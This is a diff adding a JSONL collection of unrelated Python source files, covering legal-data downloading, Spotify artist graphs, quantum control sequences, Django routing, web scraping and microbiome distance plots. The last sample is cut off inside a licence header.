diff --git "a/4101.jsonl" "b/4101.jsonl" new file mode 100644--- /dev/null +++ "b/4101.jsonl" @@ -0,0 +1,635 @@ +{"seq_id":"631762118","text":"# -*- coding: utf-8 -*-\n# \n# Archéo Lex – Pure Histoire de la Loi française\n# – crée un dépôt Git des lois françaises écrites en syntaxe Markdown\n# – ce module comprend diverses fonctions utilitaires\n# \n# This program is free software. It comes without any warranty, to\n# the extent permitted by applicable law. You can redistribute it\n# and/or modify it under the terms of the Do What The Fuck You Want\n# To Public License, Version 2, as published by Sam Hocevar. See\n# the LICENSE file for more details.\n\n# Imports\nfrom __future__ import unicode_literals\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\nimport os\nimport re\nimport subprocess\nimport datetime\nimport ftplib\nimport string\nfrom path import path\n\nMOIS = {\n 'janvier': '01',\n 'février': '02',\n 'mars': '03',\n 'avril': '04',\n 'mai': '05',\n 'juin': '06',\n 'juillet': '07',\n 'août': '08',\n 'septembre': '09',\n 'octobre': '10',\n 'novembre': '11',\n 'décembre': '12'\n}\n\n\nMOIS2 = ['', 'janvier', 'février', 'mars', 'avril', 'mai', 'juin', 'juillet', 'août', 'septembre', 'octobre', 'novembre', 'décembre']\n\n\ndef telecharger(url, fichier):\n \n subprocess.call(['wget', '--output-document=' + fichier, url])\n\n\ndef telecharger_cache(url, fichier, force=False):\n \n if os.path.exists(fichier):\n touch = datetime.datetime.fromtimestamp(os.stat(fichier).st_mtime)\n delta = datetime.datetime.today() - touch\n \n if not force or not isinstance(force, bool) and isinstance(force, (int, long, float)) and delta.total_seconds() < force:\n print('* Téléchargement de ' + url + ' (cache)')\n return True\n \n print('* Téléchargement de ' + url)\n return telecharger(url, fichier)\n\n\ndef normalisation_code(code):\n \n nom = ''\n repertoire = ''\n \n if code.startswith('code') or code.startswith('Code'):\n code = re.sub('\\'', '’', code.lower())\n nom = re.sub('[-_]', ' ', code)\n nom = nom[0].upper() + nom[1:]\n repertoire = re.sub('[ _]', '-', code)\n else:\n nom = code.lower()\n repertoire = code.lower()\n \n return repertoire, nom\n\n\ndef normalise_date(texte):\n \n texte = texte.strip()\n if texte == '2999-01-01' or not texte:\n return None\n fm = re.match('(\\d{4})-(\\d{2})-(\\d{2})', texte)\n if not fm:\n return None\n return datetime.date(int(fm.group(1)), int(fm.group(2)), int(fm.group(3)))\n\n\ndef chemin_texte(cidTexte, code=True, vigueur=True):\n \n if vigueur:\n vigueur = 'en'\n else:\n vigueur = 'non'\n \n if code:\n code = 'code'\n else:\n code = 'TNC'\n \n return os.path.join('legi', 'global', 'code_et_TNC_' + vigueur + '_vigueur', code + '_' + vigueur + '_vigueur', decompose_cid(cidTexte))\n\n\ndef decompose_cid(cidTexte):\n \n FFFF = cidTexte[0:4]\n TTTT = cidTexte[4:8]\n xx1 = cidTexte[8:10]\n xx2 = cidTexte[10:12]\n xx3 = cidTexte[12:14]\n xx4 = cidTexte[14:16]\n xx5 = cidTexte[16:18]\n \n return os.path.join(FFFF, TTTT, xx1, xx2, xx3, xx4, xx5, cidTexte)\n\n\ndef comp_infini(x, y):\n \n if x == y:\n return 0\n if x == None:\n return 1\n if y == None:\n return -1\n return -2 * int(x < y) + 1\n\n\ndef comp_infini_strict(x, y):\n \n if x == None and y == None:\n return False\n if x == None:\n return False\n if y == None:\n return True\n return x < y\n\n\ndef comp_infini_large(x, y):\n \n if x == y:\n return True\n if x == None:\n return False\n if y == None:\n return True\n return x < y\n\n\ndef nop():\n \n return\n\n\ndef verif_taille(taille, destination):\n \n s = os.statvfs(destination)\n \n if 1.05 * taille >= s.f_bavail * s.f_frsize: # en octets\n return False\n else:\n return True\n\n\n# Téléchargement des bases juridiques\n# \n# @param str identifiant 'JORF', 'LEGI', 'KALI', 'CNIL', 'CONSTIT', 'CIRCULAIRES'\n# @param str/int/None date_maj None pour télécharger toute la base\n# Pour la plus récente mise à jour avant une certaine date, utiliser 'AAAAMMJJ[-HHMMSS]', par exemple '29990101' (clin d’œil)\n# Pour la dernière, avant-dernière, etc. mise à jour, utiliser '0', '-1', etc. (ou 0, -1, etc.)\n# @param str cache\n# \n# Voici des exemples d’URLs :\n# - ftp://jorf:open1234@ftp2.journal-officiel.gouv.fr/LicenceFreemium_jorf_jorf_global_20140718-104554.tar.gz\n# - ftp://legi:open1234@ftp2.journal-officiel.gouv.fr/LicenceFreemium_legi_legi_global_20140718-113010.tar.gz\n# - ftp://kali:open1234@ftp2.journal-officiel.gouv.fr/LicenceFreemium_kali_kali__20140718-142314.tar.gz\n# - ftp://cnil:open1234@ftp2.journal-officiel.gouv.fr/LicenceFreemium_CNIL_cnil_global_20140718-104251.tar.gz\n# - ftp://constit:open1234@ftp2.journal-officiel.gouv.fr/LicenceFreemium_CONSTIT_constit_global_20140718-104144.tar.gz\n# - ftp://anonymous:@echanges.dila.gouv.fr:6370/CIRCULAIRES/ (non-testé, très probablement non-fonctionnel)\n# Voir http://rip.journal-officiel.gouv.fr/index.php/pages/juridiques\ndef telecharger_base(identifiant, date_maj, cache):\n \n identifiant = identifiant.upper()\n if identifiant not in ['JORF', 'LEGI', 'KALI', 'CNIL', 'CONSTIT']:\n raise Exception()\n if isinstance(date_maj, int):\n date_maj = str(date_maj)\n elif not isinstance(date_maj, str) and not date_maj == None:\n raise Exception()\n path(os.path.join(cache, 'tar')).mkdir_p()\n \n serveur = {\n 'JORF': ('ftp', 'ftp2.journal-officiel.gouv.fr', 'jorf', 'open1234'),\n 'LEGI': ('ftp', 'ftp2.journal-officiel.gouv.fr', 'legi', 'open1234'),\n 'KALI': ('ftp', 'ftp2.journal-officiel.gouv.fr', 'kali', 'open1234'),\n 'CNIL': ('ftp', 'ftp2.journal-officiel.gouv.fr', 'cnil', 'open1234'),\n 'CONSTIT': ('ftp', 'ftp2.journal-officiel.gouv.fr', 'constit', 'open1234'),\n 'CIRCULAIRES': ('ftp', 'echanges.dila.gouv.fr:6370/CIRCULAIRES/', 'anonymous', ''),\n }\n fichier_base = {\n 'JORF': 'LicenceFreemium_jorf_jorf_global_%Y%m%d-%H%M%S.tar.gz',\n 'LEGI': 'LicenceFreemium_legi_legi_global_%Y%m%d-%H%M%S.tar.gz',\n 'KALI': 'LicenceFreemium_kali_kali__%Y%m%d-%H%M%S.tar.gz',\n 'CNIL': 'LicenceFreemium_CNIL_cnil_global_%Y%m%d-%H%M%S.tar.gz',\n 'CONSTIT': 'LicenceFreemium_CONSTIT_constit_global_%Y%m%d-%H%M%S.tar.gz',\n 'CIRCULAIRES': ''\n }\n fichier_majo = {\n 'JORF': 'jorf_%Y%m%d-%H%M%S.tar.gz',\n 'LEGI': 'legi_%Y%m%d-%H%M%S.tar.gz',\n 'KALI': 'kali_%Y%m%d-%H%M%S.tar.gz',\n 'CNIL': 'cnil_%Y%m%d-%H%M%S.tar.gz',\n 'CONSTIT': 'constit_%Y%m%d-%H%M%S.tar.gz',\n 'CIRCULAIRES': ''\n }\n \n # Connexion FTP\n connexion_ftp = ftplib.FTP(serveur[identifiant][1], serveur[identifiant][2], serveur[identifiant][3])\n liste_fichiers = connexion_ftp.nlst()\n \n # Recherche du fichier le plus récent et toutefois antérieure à la date demandée\n if date_maj == None:\n prefixe = string.split(fichier_base[identifiant], '%')[0]\n type_fichier = 'base'\n else:\n prefixe = string.split(fichier_majo[identifiant], '%')[0]\n type_fichier = 'majo'\n dates = []\n for fichier in liste_fichiers:\n if fichier.startswith(prefixe):\n dates.append(re.sub(prefixe + '([0-9-]+)\\.tar\\.gz', r'\\1', fichier))\n dates.sort(None, None, True)\n date_selectionnee = 0\n if date_maj:\n if len(date_maj) == 8:\n date_maj = date_maj + '-235959'\n if re.match('^(0|-\\d+)$', date_maj):\n date_selectionnee = -int(date_maj)\n else:\n while date_selectionnee < len(dates) and dates[date_selectionnee] > date_maj:\n date_selectionnee = date_selectionnee + 1\n if date_selectionnee == len(dates):\n raise Exception()\n recent = dates[date_selectionnee]\n \n # Création de l’URL\n url = serveur[identifiant][0] + '://' + serveur[identifiant][2] + ':' + serveur[identifiant][3] + '@' + serveur[identifiant][1] + '/' + prefixe + recent + '.tar.gz'\n \n # Vérification de la taille disponible\n if not verif_taille(connexion_ftp.size(prefixe + recent + '.tar.gz'), cache) and not os.path.exists(identifiant + '-' + type_fichier + '-' + recent + '.tar.gz'):\n raise Exception()\n connexion_ftp.close()\n \n # Téléchargement de la base demandée\n return telecharger_cache(url, os.path.join(cache, 'tar', identifiant + '-' + type_fichier + '-' + recent + '.tar.gz'))\n\n","sub_path":"marcheolex/utilitaires.py","file_name":"utilitaires.py","file_ext":"py","file_size_in_byte":8605,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"391071591","text":"\r\nimport pandas as pd\r\nimport matplotlib.pyplot as plt\r\nimport networkx as nx\r\nfrom pprint import pprint\r\nfrom config import spotify\r\nfrom tqdm import tqdm\r\n\r\ndef find_artists(name):\r\n \"\"\" 最初の探索 \"\"\"\r\n artist_df = pd.DataFrame(columns=['artist_name', 'artist_ID', 'genres', 'popularity', 'related_artist_names'])\r\n spotapi_out = spotify.search(q='artist:' + name, type='artist')\r\n artist_items = spotapi_out['artists']['items'][0]\r\n artist_id = artist_items['id']\r\n artid_list = [artist_id]\r\n atrname_related_list = []\r\n spotapi_out_related = spotify.artist_related_artists(artist_id)\r\n for artname_related in spotapi_out_related['artists']:\r\n atrname_related_list.append(artname_related['name'])\r\n sr = pd.Series([artist_items['name'], artist_items['id'], artist_items['genres'], artist_items['popularity'], atrname_related_list], index=artist_df.columns)\r\n artist_df = artist_df.append(sr, ignore_index=True)\r\n return artid_list, artist_df\r\n\r\ndef find_related_artists(depth):\r\n \"\"\" depth分類似するアーティストを探索する \"\"\"\r\n # 名前は英語名でないと正常に返ってこないので注意\r\n artid_list, artist_df = find_artists('Sumire Uesaka')\r\n artid_list_tail = 0\r\n for i in range(depth):\r\n artid_list_head = artid_list_tail\r\n artid_list_tail = len(artid_list)\r\n for artid in tqdm(artid_list[artid_list_head:artid_list_tail]):\r\n spotapi_out = spotify.artist_related_artists(artid)\r\n for artid_related in spotapi_out['artists']:\r\n # 類似のアーティストリストを作成\r\n artname_related2_list = []\r\n spotapi_out_related = spotify.artist_related_artists(artid_related['id'])\r\n for artname_related2 in spotapi_out_related['artists']:\r\n artname_related2_list.append(artname_related2['name'])\r\n artid_list.append(artid_related['id'])\r\n sr = pd.Series([artid_related['name'], artid_related['id'], artid_related['genres'], \r\n artid_related['popularity'], artname_related2_list], index=artist_df.columns)\r\n artist_df = artist_df.append(sr ,ignore_index=True)\r\n return artid_list, artist_df\r\n\r\nartid_list, artist_df = find_related_artists(1)\r\n\r\nprint(artist_df)\r\n\r\n\r\n# アーティストの関係辞書を作る\r\nartdic = {}\r\nfor i in range(len(artid_list)):\r\n artdic[artist_df.iloc[i,0]] = []\r\n for artname_related in artist_df.iloc[i,4]:\r\n artdic[artist_df.iloc[i,0]].append(artname_related)\r\n\r\nprint(artdic)\r\n\r\n# nodeとedgeの設定\r\nG = nx.Graph()\r\nG.add_nodes_from(list(artdic.keys()))\r\nfor parent in artdic.keys():\r\n relation = [(parent, child) for child in artdic[parent]]\r\n G.add_edges_from(relation)\r\n\r\n# sizeとcolorの設定\r\naverage_deg = sum(d for n, d in G.degree()) / G.number_of_nodes()\r\nsizes = [1000*d/average_deg for n, d in G.degree()]\r\ncolors = [i/len(G.nodes) for i in range(len(G.nodes))]\r\n\r\n# 探索する次数によってfigsizeを変更\r\nplt.figure(figsize=(50,50))\r\nnx.draw(G, font_family='Yu Gothic', with_labels=True, node_size=sizes, node_color=colors)\r\nplt.savefig('depth2.png')\r\nplt.show()\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"api/spotify/spotify_api.py","file_name":"spotify_api.py","file_ext":"py","file_size_in_byte":3253,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"412526844","text":"# -*- coding: utf-8 -*-\nr\"\"\"\nControl sequences (:mod:`qit.seq`)\n==================================\n\n\nPiecewise constant control sequences for quantum systems.\nEach control sequence is a dictionary with the following keys:\n\n======= ===============================================================================================\nA Drift generator (typically :math:`i/\\hbar` times a Hamiltonian and a time unit of your choice).\nB List of control generators. c := len(B).\ntau Vector of durations of the time slices. m := len(tau).\ncontrol Array, shape (m, c). control[i,j] is the value of control field j during time slice i.\n======= ===============================================================================================\n\nThe total generator for the time slice j is thus given by\n\n.. math::\n\n G_j = A +\\sum_k \\text{control}_{jk} B_k,\n\nand the corresponding propagator is\n\n.. math::\n\n P_j = \\exp(-\\tau_j G_j).\n\n\nNOTE the unusual sign convention.\n\n\n.. currentmodule:: qit.seq\n\nContents\n--------\n\n.. autosummary::\n\n nmr\n corpse\n bb1\n scrofulous\n cpmg\n seq2prop\n propagate\n\"\"\"\n# Ville Bergholm 2011-2014\n\nfrom __future__ import division, absolute_import, print_function, unicode_literals\n\nfrom numpy import array, sin, cos, arcsin, arccos, pi, asarray, eye, zeros, r_, c_, dot, nonzero, ceil, linspace\nfrom scipy.linalg import expm\nfrom scipy.optimize import brentq\n\nfrom .base import sx, sy, tol\n\n\n__all__ = ['nmr', 'bb1', 'corpse', 'cpmg', 'scrofulous', 'seq2prop', 'propagate']\n\n\ndef nmr(a):\n r\"\"\"Convert NMR-style rotations into a one-qubit control sequence.\n\n Returns a one-qubit control sequence corresponding to the array a:\n\n .. math::\n\n a = [[\\theta_1, \\phi_1], [\\theta_2, \\phi_2], ...]\n\n Each :math:`\\theta, \\phi` pair corresponds to a NMR rotation\n of the form :math:`\\theta_\\phi`,\n or a rotation of the angle :math:`\\theta`\n about the unit vector :math:`[\\cos(\\phi), \\sin(\\phi), 0]`.\n\n .. math::\n\n R_{\\vec{a}}(\\theta) = \\exp(-i \\vec{a} \\cdot \\vec{\\sigma} \\theta/2) = \\exp(-i H t) \\quad \\Leftarrow \\quad\n H = \\vec{a} \\cdot \\vec{\\sigma}/2, \\quad t = \\theta.\n \"\"\"\n # Ville Bergholm 2006-2009\n\n a = asarray(a, dtype=float)\n theta = a[:, 0]\n phi = a[:, 1]\n\n # find theta angles that are negative, convert them to corresponding positive rotations\n rows = nonzero(theta < 0)[0]\n theta[rows] = -theta[rows]\n phi[rows] = phi[rows] + pi\n\n # construct the sequence TODO make it a class?\n # NOTE the strange sign convention in A and B\n s = {'A': zeros((2, 2)),\n 'B': [0.5j * sx, 0.5j * sy],\n 'tau': theta,\n 'control': c_[cos(phi), sin(phi)]\n }\n return s \n\n\ndef bb1(theta, phi=0, location=0.5):\n r\"\"\"Sequence for correcting pulse length errors.\n\n Returns the Broadband number 1 control sequence for correcting\n proportional errors in pulse length (or amplitude) :cite:`Wimperis`.\n\n The target rotation is :math:`\\theta_\\phi` in the NMR notation.\n \"\"\"\n # Ville Bergholm 2009-2012\n\n ph1 = arccos(-theta / (4*pi))\n W1 = [[pi, ph1], [2*pi, 3*ph1], [pi, ph1]]\n return nmr([[location * theta, phi]] + W1 + [[(1-location) * theta, phi]])\n\n\ndef corpse(theta, phi=0):\n r\"\"\"Sequence for correcting off-resonance errors.\n\n Returns the CORPSE control sequence for correcting off-resonance\n errors, i.e. ones arising from a constant but unknown\n :math:`\\sigma_z` bias in the Hamiltonian :cite:`Cummins`\n\n The target rotation is :math:`\\theta_\\phi` in the NMR notation.\n\n CORPSE: Compensation for Off-Resonance with a Pulse SEquence\n \"\"\"\n # Ville Bergholm 2009\n\n n = [1, 1, 0] # CORPSE\n #n = [0, 1, 0] # short CORPSE\n\n temp = arcsin(sin(theta / 2) / 2)\n\n th1 = 2*pi*n[0] +theta/2 -temp\n th2 = 2*pi*n[1] -2*temp\n th3 = 2*pi*n[2] +theta/2 -temp\n return nmr([[th1, phi], [th2, phi+pi], [th3, phi]])\n\n\ndef cpmg(t, n):\n r\"\"\"Carr-Purcell-Meiboom-Gill sequence.\n\n Returns the Carr-Purcell-Meiboom-Gill sequence of n repeats with waiting time t.\n The purpose of the CPMG sequence is to facilitate a T_2 measurement\n under a nonuniform z drift, it is not meant to be a full memory protocol.\n The target operation for this sequence is identity.\n \"\"\"\n # Ville Bergholm 2007-2012\n\n s = nmr([[pi/2, pi/2]]) # initial y rotation\n\n # step: wait, pi x rotation, wait\n step_tau = array([t, pi, t])\n step_ctrl = array([[0, 0], [1, 0], [0, 0]])\n for k in range(n):\n s['tau'] = r_[s['tau'], step_tau]\n s['control'] = r_[s['control'], step_ctrl]\n return s\n\n\ndef scrofulous(theta, phi=0):\n r\"\"\"Sequence for correcting pulse length errors.\n\n Returns the SCROFULOUS control sequence for correcting errors\n in pulse duration (or amplitude) :cite:`Cummins`.\n\n The target rotation is :math:`\\theta_\\phi` in the NMR notation.\n\n SCROFULOUS: Short Composite ROtation For Undoing Length Over- and UnderShoot\n \"\"\"\n # Ville Bergholm 2006-2014\n\n th1 = brentq(lambda t: (sin(t)/t -(2 / pi) * cos(theta / 2)), 0.1, 4.6)\n ph1 = arccos(-pi * cos(th1) / (2 * th1 * sin(theta / 2)))\n ph2 = ph1 - arccos(-pi / (2 * th1))\n\n u1 = [[th1, ph1 +phi]]\n u2 = [[pi, ph2 +phi]]\n return nmr(u1 + u2 + u1)\n\n\ndef seq2prop(s):\n r\"\"\"Propagator corresponding to a control sequence.\n\n Returns the propagator matrix corresponding to the\n action of the control sequence s.\n\n Governing equation: :math:`\\dot(X)(t) = -(A +\\sum_k u_k(t) B_k) X(t) = -G(t) X(t)`.\n \"\"\"\n # Ville Bergholm 2009-2012\n\n A = s['A']\n B = s['B']\n\n n = len(s['tau'])\n P = eye(A.shape[0])\n for j in range(n):\n G = A\n for k, b in enumerate(B):\n G = G + s['control'][j, k] * b\n\n temp = expm(-s['tau'][j] * G) # NOTE the sign convention here\n P = dot(temp, P)\n\n return P\n\n\ndef propagate(s, seq, out_func=lambda x: x, base_dt=0.1):\n \"\"\"Propagate a state in time using a control sequence.\n \n If no output function is given, we use an identity map.\n \"\"\"\n # Ville Bergholm 2009-2014\n\n A = seq['A']\n B = seq['B']\n\n n = len(seq['tau'])\n t = [0] # initial time\n out = [out_func(s)] # initial state\n\n # loop over the sequence\n for j in range(n):\n G = A\n for k, b in enumerate(B):\n G = G + seq['control'][j, k] * b\n\n T = seq['tau'][j] # pulse duration\n n_steps = max(int(ceil(T / base_dt)), 1)\n dt = T / n_steps\n\n P = expm(-G * dt) # NOTE TODO the sign convention here\n for k in range(n_steps):\n s = s.u_propagate(P)\n out.append(out_func(s))\n\n temp = t[-1]\n t.extend(list(linspace(temp+dt, temp+T, n_steps)))\n return out, t\n","sub_path":"qit/seq.py","file_name":"seq.py","file_ext":"py","file_size_in_byte":6745,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"551059847","text":"\n\nfrom xai.brain.wordbase.verbs._hurl import _HURL\n\n#calss header\nclass _HURLED(_HURL, ):\n\tdef __init__(self,): \n\t\t_HURL.__init__(self)\n\t\tself.name = \"HURLED\"\n\t\tself.specie = 'verbs'\n\t\tself.basic = \"hurl\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/verbs/_hurled.py","file_name":"_hurled.py","file_ext":"py","file_size_in_byte":226,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"523824535","text":"\"\"\"ask_gulyachenkov URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/2.2/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.urls import path\nfrom question import views\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n path('question/', views.index_html, name=\"test\"),\n path('question/', views.one_question, name=\"one_question_url\"),\n path('', views.index_html, name=\"index\"),\n path('login/', views.login_html, name=\"login_url\"),\n path('register/', views.register_html, name=\"register_url\"),\n path('add_question/', views.add_question_html, name=\"add_question_url\"),\n path('question_by_tag/', views.questions_by_tag_html, name=\"question_by_tag_url\"),\n path('hot_questions/', views.hot_questions_html, name=\"hot_questions_url\"),\n path('logout/', views.log_out, name=\"logout_url\"),\n path('profile/edit', views.profile_edit, name=\"profile_edit_url\"),\n path('vote/', views.vote, name=\"vote_url\"),\n path('checkbox/', views.checkbox, name=\"checkbox_url\"),\n\n]\n","sub_path":"ask_gulyachenkov/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1572,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"528550720","text":"#!/bin/bash\n#coding:utf8\nimport re;\nimport urllib;\nimport datetime;\nimport MySQLdb;\n\nreg=r''; #正则表达式\nquesre=re.compile(reg);\n\ndef getHtml(url):\n\tpage=urllib.urlopen(url);\n\t#urllib.urlretrieve('https://www.zhihu.com/','a.html');\n\thtml=page.read();\n\treturn html;\n\ndef getImg(html):\n\tquesList=re.findall(quesre,html);\n\tli=[];\n\tfor ques in quesList:\n\t\tupdate_time=datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S');\n\t\tli.append(('https://www.zhihu.com'+ques,update_time));\n\treturn li;\n\n\nconn=MySQLdb.Connect(host='localhost',port=3306,user='root',passwd='123456',db='test',charset='utf8')\nhtml=getHtml('https://www.zhihu.com/');\n#print html;\nli=getImg(html);\n#print li;\nsql = \"insert into question (url,update_time) values(%s,%s)\";\ncur=conn.cursor();\ncur.executemany(sql,li);\nconn.commit();\ncur.execute(\"drop table if exists `tmp`\");\ncur.execute(\"create table tmp as select min(id) as id from question group by url\");\ncur.execute(\"delete from question where id not in (select id from tmp)\");\nconn.commit();\nconn.cursor().close();\nconn.close();\n","sub_path":"getzhihuquestion.py","file_name":"getzhihuquestion.py","file_ext":"py","file_size_in_byte":1091,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"384365374","text":"'''\nCopyright 2013 Paul Sidnell\n\nLicensed under the Apache License, Version 2.0 (the \"License\");\nyou may not use this file except in compliance with the License.\nYou may obtain a copy of the License at\n\n http://www.apache.org/licenses/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License.\n'''\n\nfrom fmt_template import Formatter\n\ndef escape (val):\n return val.replace('\"','"').replace('&','&').replace('<','<').replace('>','>')\n\ndef format_note (lines):\n return ' '.join([escape (line) for line in lines])\n \nclass PrintOpmlVisitor(Formatter):\n def __init__ (self, out, template):\n attrib_conversions = {\n 'id' : lambda x: escape(x),\n 'name' : lambda x: escape(x),\n 'link' : lambda x: x,\n 'status' : lambda x: x,\n 'flagged' : lambda x: str(x) if x else None,\n 'context' : lambda x: escape(''.join (x.name.split ())),\n 'project' : lambda x: escape(''.join (x.name.split ())),\n 'date_to_start' : lambda x: x.strftime(template.date_format),\n 'date_due' : lambda x: x.strftime(template.date_format),\n 'date_completed' : lambda x: x.strftime(template.date_format),\n 'note' : lambda x: format_note (x.get_note_lines ())\n }\n Formatter.__init__(self, out, template, attrib_conversions = attrib_conversions)","sub_path":"bin/ofexport-master/src/main/python/of_to_opml.py","file_name":"of_to_opml.py","file_ext":"py","file_size_in_byte":1844,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"533041142","text":"# -*- encoding: utf-8 -*-\nfrom guillotina import configure\nfrom guillotina.content import Folder\nfrom guillotina.interfaces import IFolder\nfrom guillotina_cms.fields.richtext import RichTextField\nfrom guillotina_cms import _\nfrom guillotina.directives import index\n\n\nclass IDocument(IFolder):\n\n index('text', type='text')\n text = RichTextField(\n title=_('Text'),\n required=False,\n widget='richtext')\n\n\n@configure.contenttype(\n type_name='Document',\n schema=IDocument,\n behaviors=['guillotina.behaviors.dublincore.IDublinCore'],\n allowed_types=[] # dynamically calculated\n)\nclass Document(Folder):\n pass\n","sub_path":"guillotina_cms/content/document.py","file_name":"document.py","file_ext":"py","file_size_in_byte":646,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"643787134","text":"class Solution(object):\n\n def strobogrammaticInRange(self, low, high):\n \"\"\"\n :type low: str\n :type high: str\n :rtype: int\n \"\"\"\n if len(high) < len(low) or (len(high) == len(low) and high < low):\n return 0\n result = 0\n for i in xrange(len(low), len(high) + 1):\n result += self.count(i)\n low_set = self.dfs(len(low), len(low))\n high_set = self.dfs(len(high), len(high)) if len(\n low) != len(high) else low_set\n for s in low_set:\n if s < low:\n result -= 1\n for s in high_set:\n if s > high:\n result -= 1\n return result\n\n def count(self, n):\n if n == 0:\n return 0\n if n == 1:\n return 3\n if n % 2 == 0:\n return 4 * (5 ** (n / 2 - 1))\n return 3 * 4 * (5 ** (n / 2 - 1))\n\n def dfs(self, n, max_val):\n \"\"\"\n :type n: int\n :rtype: List[str]\n \"\"\"\n if n == 0:\n return ['']\n if n == 1:\n return ['1', '8', '0']\n result = []\n r = self.dfs(n - 2, max_val)\n for s in r:\n if n != max_val:\n result.append('0' + s + '0')\n result.append('1' + s + '1')\n result.append('8' + s + '8')\n result.append('6' + s + '9')\n result.append('9' + s + '6')\n return result\n","sub_path":"leetcode_python/248_Strobogrammatic_Number_III.py","file_name":"248_Strobogrammatic_Number_III.py","file_ext":"py","file_size_in_byte":1443,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"386518971","text":"from character import *\nfrom geometry import *\nfrom general import *\n\nclass Player:\n def __init__(self, system, client):\n self.system = system\n client.system = system\n\n system.players_locker.acquire()\n self.id = system.next_player\n system.next_player = system.next_player + 1\n system.players[self.id] = self\n system.players_locker.release()\n \n self.client = client\n client.player = self\n\n self.perspective = {}\n\n def create_role(self):\n self.role = Character(self.system, self, \"characters/champions/hardfake/init.py\")\n \n def on_remove(self):\n self.system.players_locker.acquire()\n del self.system.players[self.id]\n self.system.players_locker.release()\n\n self.system.event_handler.event_remove(self.role)\n\n def pack_data(self, statement):\n new_perspective = pack_check_dic(self.perspective, statement)\n if not new_perspective:\n new_perspective = {}\n\n temp = self.perspective.copy()\n for id in temp:\n if not id in statement:\n new_perspective[id] = \"r\"\n del self.perspective[id]\n return new_perspective","sub_path":"game_project/server/player.py","file_name":"player.py","file_ext":"py","file_size_in_byte":1218,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"34469711","text":"import matplotlib.pyplot as plt\nimport pandas as pd\nimport seaborn as sns\nimport scipy\nimport warnings\n\nfrom onecodex.exceptions import OneCodexException\nfrom onecodex.helpers import normalize_classifications\nfrom onecodex.distance import braycurtis, cityblock, jaccard, unifrac\n\n\ndef plot_distance(analyses, metric='braycurtis',\n title=None, label=None, xlabel=None, ylabel=None,\n field='readcount_w_children', rank='species', **kwargs):\n \"\"\"Plot beta diversity distance matrix.\n\n Additional **kwargs are passed to Seaborn's `sns.clustermap`.\n \"\"\"\n # if taxonomy trees are inconsistent, unifrac will not work\n if metric in ['braycurtis', 'bray-curtis', 'bray curtis']:\n f = braycurtis\n elif metric in ['manhattan', 'cityblock']:\n f = cityblock\n elif metric == 'jaccard':\n f = jaccard\n elif metric == 'unifrac':\n f = unifrac\n else:\n raise OneCodexException(\"'metric' must be one of \"\n \"braycurtis, manhattan, jaccard, or unifrac\")\n\n normed_classifications, metadata = normalize_classifications(analyses, label=label)\n if len(normed_classifications) < 2:\n raise OneCodexException('`plot_distance` requires 2 or more valid classification results.')\n\n sns.set(style=kwargs.pop('style', 'darkgrid'))\n\n # there is no uniqueness constraint on metadata names\n # so plot by uuid, then replace the labels in the dataframe with their names\n uuids = {}\n sample_names = {}\n for idx, analysis in enumerate(normed_classifications):\n uuids[analysis.id] = analysis.id\n sample_names[analysis.id] = metadata.loc[idx, '_display_name']\n\n distances = f(normed_classifications, field=field, rank=rank)\n ids = distances.ids\n distance_matrix = distances.data\n dists = {}\n for idx1, id1 in enumerate(ids):\n dists[uuids[id1]] = {}\n for idx2, id2 in enumerate(ids):\n dists[uuids[id1]][uuids[id2]] = distance_matrix[idx1][idx2]\n dists = pd.DataFrame(dists).rename(index=sample_names, columns=sample_names)\n\n # Plot cluster map; ignore new SciPy cluster warnings\n with warnings.catch_warnings():\n warnings.simplefilter('ignore', scipy.cluster.hierarchy.ClusterWarning)\n g = sns.clustermap(dists, **kwargs)\n\n plt.setp(g.ax_heatmap.yaxis.get_majorticklabels(), rotation=0)\n\n # Labels\n if xlabel is not None:\n plt.gca().set_xlabel(xlabel)\n if ylabel is not None:\n plt.gca().set_ylabel(ylabel)\n\n if title:\n g.fig.suptitle(title)\n plt.show()\n","sub_path":"onecodex/viz/_distance.py","file_name":"_distance.py","file_ext":"py","file_size_in_byte":2582,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"514669816","text":"# -*- coding: utf-8 -*-\r\n##############################################################################\r\n#\r\n# OpenERP, Open Source Management Solution\r\n# Copyright (C) 2004-2010 Tiny SPRL ().\r\n#\r\n# This program is free software: you can redistribute it and/or modify\r\n# it under the terms of the GNU Affero General Public License as\r\n# published by the Free Software Foundation, either version 3 of the\r\n# License, or (at your option) any later version.\r\n#\r\n# This program is distributed in the hope that it 